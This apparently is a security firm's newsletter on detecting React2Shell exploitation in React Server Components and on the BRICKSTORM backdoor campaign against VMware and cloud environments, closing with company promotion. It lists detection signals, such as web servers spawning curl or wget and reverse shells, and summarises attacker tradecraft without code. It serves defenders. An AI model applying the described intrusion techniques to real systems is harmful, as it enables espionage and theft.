Today’s Topics:

• Detecting React2Shell: What Security Teams Should Be Watching for Right Now
• BRICKSTORM: How PRC Operators Are Turning VMware and Cloud Infrastructure into Long-Term Access Platforms
• How can Netizen help?

Detecting React2Shell: What Security Teams Should Be Watching for Right Now

Since the disclosure of CVE-2025-55182 on December 3, 2025, most of the attention around React2Shell has centered on patching timelines and framework exposure. That is necessary, but for many environments, detection is the real safety net while fixes are staged, tested, and deployed. This vulnerability enables unauthenticated remote code execution against React Server Components through a single crafted HTTP request, and public proof-of-concept code is already circulating. With default configurations proving exploitable in most cases, security teams should assume active scanning and live exploitation attempts are already taking place.

The core behavior to watch for is unexpected server-side command execution originating from Next.js, React Router, or other RSC-backed runtimes. Once the deserialization flaw in the React “Flight” protocol is triggered, attackers can instruct the server to spawn shell commands directly. In practice, this often surfaces as web-facing services suddenly executing file system commands, downloading secondary payloads, or opening outbound connections that do not align with normal application behavior. Any instance of a web server process invoking utilities like ls, cat, curl, wget, chmod, or similar tools in production should be treated as a high-confidence signal.

Runtime detection has already proven effective against this activity. The Sysdig Threat Research Team reinforced its “Suspicious Command Executed by Web Server” logic to catch React2Shell exploitation as it happens. Their Falco rule focuses on process execution events where a shell is launched by next-server, react-router, waku, or vite-related processes and then used to execute common Unix commands. In observed cases, this rule alone has been sufficient to surface exploitation almost immediately. Additional runtime alerts such as reverse shell detections and UNIX socket redirections have also been triggered during real attack simulations, which aligns with attacker behavior focused on persistence and remote control.

Network-layer protections also play a role, though they should be treated strictly as short-term containment. Cloudflare, Google Cloud Armor, Vercel, and Firebase have all deployed platform-level rules aimed at blocking exploitation attempts tied to unsafe deserialization in POST requests. These controls can reduce opportunistic attacks, but they do not change the underlying application behavior. WAF bypass techniques remain a routine part of modern exploit chains, so organizations relying solely on edge filtering remain exposed.

Vulnerability scanning adds another detection layer, though teams should be cautious about tool quality. Many publicly shared scanners misidentify React2Shell or fail to confirm exploitability accurately. Assetnote released one of the more reliable approaches by triggering a specific server error response tied to the vulnerable deserialization logic. Platforms with integrated vulnerability management can already flag affected React packages directly through software inventory, which helps prioritize response across large environments.

From a defensive standpoint, the detection priority is straightforward: watch for anomalous command execution by web services, monitor outbound connections from application servers that do not normally initiate external traffic, and treat any reverse shell indicators as confirmation of compromise. These signals tend to appear quickly after successful exploitation because attackers gain immediate code execution and typically move to payload delivery or persistence within seconds.

Patching remains the only real fix, but detection is what buys response teams time. Updated React Server Components releases at 19.0.1, 19.1.2, and 19.2.1 remove the vulnerable code path, and patched Next.js versions close downstream exposure. Until those updates are fully deployed, continuous runtime monitoring is the line that separates a blocked exploit attempt from a full server takeover.

BRICKSTORM: How PRC Operators Are Turning VMware and Cloud Infrastructure into Long-Term Access Platforms

CISA confirmed last week that a sophisticated backdoor called BRICKSTORM is being actively used by state-sponsored operators from the People’s Republic of China to maintain long-term, covert access inside U.S. networks. The malware targets both VMware vSphere and Windows environments and is designed for persistence, remote command execution, and stealthy command-and-control. According to CISA, BRICKSTORM gives attackers interactive shell access along with full file manipulation capabilities, making it a powerful post-exploitation platform rather than a simple loader or beacon.

BRICKSTORM is written in Golang and supports multiple C2 channels, including HTTPS, WebSockets, nested TLS, and DNS-over-HTTPS. It can also operate as a SOCKS proxy, which allows attackers to tunnel traffic through compromised systems and pivot deeper into internal networks. One of its more dangerous traits is its built-in self-monitoring logic that automatically reinstalls or restarts the implant if it is disrupted. That single feature sharply increases dwell time by allowing the malware to survive partial remediation efforts.

The malware was first documented in 2024 by Google Mandiant during investigations tied to the zero-day exploitation of Ivanti Connect Secure vulnerabilities, including CVE-2023-46805 and CVE-2024-21887. Since then, the activity has matured. CISA now ties the tool to operations conducted by UNC5221 and a separate China-nexus threat cluster that CrowdStrike tracks as Warp Panda. CrowdStrike reports that Warp Panda has been active since at least 2022 and has focused heavily on VMware vCenter environments inside U.S. legal, technology, and manufacturing organizations throughout 2025.

In one confirmed intrusion, attackers gained initial access to a public-facing web server inside a DMZ using a web shell, then moved laterally into an internal vCenter server where BRICKSTORM was implanted after privilege escalation. From there, the operators harvested service account credentials, accessed a domain controller over RDP, and extracted Active Directory data. They continued moving laterally using SMB to additional jump servers and an ADFS server, where cryptographic keys were exfiltrated. From the compromised vCenter system, they were then able to shovel traffic between hypervisors and guest VMs while disguising BRICKSTORM as a legitimate vCenter process.

CISA’s technical breakdown shows that BRICKSTORM relies on custom handlers to spin up web servers on compromised hosts, establish SOCKS proxy tunnels, and execute commands remotely. Some components are purpose-built for virtualized environments and leverage the VSOCK interface for inter-VM communication, data exfiltration, and resilience across ESXi hosts and guest machines. CrowdStrike confirmed that in several intrusions, BRICKSTORM was deployed alongside two previously undocumented Golang implants named Junction and GuestConduit. Junction acts as a local HTTP command server and proxy layer on ESXi hosts, while GuestConduit sits inside guest VMs and maintains a persistent VSOCK listener on port 5555 to bridge traffic back to the hypervisor.

Initial access continues to rely on edge device exploitation and stolen or abused credentials. Confirmed vulnerabilities include multiple Ivanti Connect Secure flaws, VMware vCenter bugs such as CVE-2024-38812, CVE-2023-34048, and CVE-2021-22005, as well as CVE-2023-46747 in F5 BIG-IP. Once inside vCenter, the attackers use SSH, the privileged “vpxuser” account, and SFTP to move laterally and shuttle data between hosts. Their cleanup discipline remains strong, with timestomping, aggressive log clearing, and short-lived rogue virtual machines used for staging operations before being destroyed.

What makes Warp Panda’s activity especially concerning is its cloud focus. CrowdStrike described the group as “cloud-conscious,” noting repeated abuse of Microsoft Azure environments after on-prem compromise. Attackers accessed OneDrive, SharePoint, and Exchange by stealing browser session tokens and replaying them through BRICKSTORM tunnels. In at least one case, they registered new MFA devices to entrench access and used Microsoft Graph API calls to enumerate service principals, applications, directory roles, and user mailboxes. This shows a clean operational bridge between on-prem virtualization compromise and direct exploitation of SaaS identity planes.

The operational goal is not disruption. Everything about this malware stack points to intelligence collection and quiet, long-term access. CrowdStrike observed attackers cloning domain controller virtual machines inside vCenter to extract Active Directory databases offline. They also accessed employee email accounts aligned with Chinese government interest areas and performed limited reconnaissance against foreign government networks from within U.S. infrastructure. This is classic strategic access behavior backed by modern virtualization tradecraft.

How Can Netizen Help?

Founded in 2013, Netizen is an award-winning technology firm that develops and leverages cutting-edge solutions to create a more secure, integrated, and automated digital environment for government, defense, and commercial clients worldwide. Our innovative solutions transform complex cybersecurity and technology challenges into strategic advantages by delivering mission-critical capabilities that safeguard and optimize clients’ digital infrastructure. One example of this is our popular “CISO-as-a-Service” offering that enables organizations of any size to access executive level cybersecurity expertise at a fraction of the cost of hiring internally. 

Netizen also operates a state-of-the-art 24x7x365 Security Operations Center (SOC) that delivers comprehensive cybersecurity monitoring solutions for defense, government, and commercial clients. Our service portfolio includes cybersecurity assessments and advisory, hosted SIEM and EDR/XDR solutions, software assurance, penetration testing, cybersecurity engineering, and compliance audit support. We specialize in serving organizations that operate within some of the world’s most highly sensitive and tightly regulated environments where unwavering security, strict compliance, technical excellence, and operational maturity are non-negotiable requirements. Our proven track record in these domains positions us as the premier trusted partner for organizations where technology reliability and security cannot be compromised.

Netizen holds ISO 27001, ISO 9001, ISO 20000-1, and CMMI Level III SVC registrations demonstrating the maturity of our operations. We are a proud Service-Disabled Veteran-Owned Small Business (SDVOSB) certified by U.S. Small Business Administration (SBA) that has been named multiple times to the Inc. 5000 and Vet 100 lists of the most successful and fastest-growing private companies in the nation. Netizen has also been named a national “Best Workplace” by Inc. Magazine, a multiple awardee of the U.S. Department of Labor HIRE Vets Platinum Medallion for veteran hiring and retention, the Lehigh Valley Business of the Year and Veteran-Owned Business of the Year, and the recipient of dozens of other awards and accolades for innovation, community support, working environment, and growth.

Looking for expert guidance to secure, automate, and streamline your IT infrastructure and operations? Start the conversation today.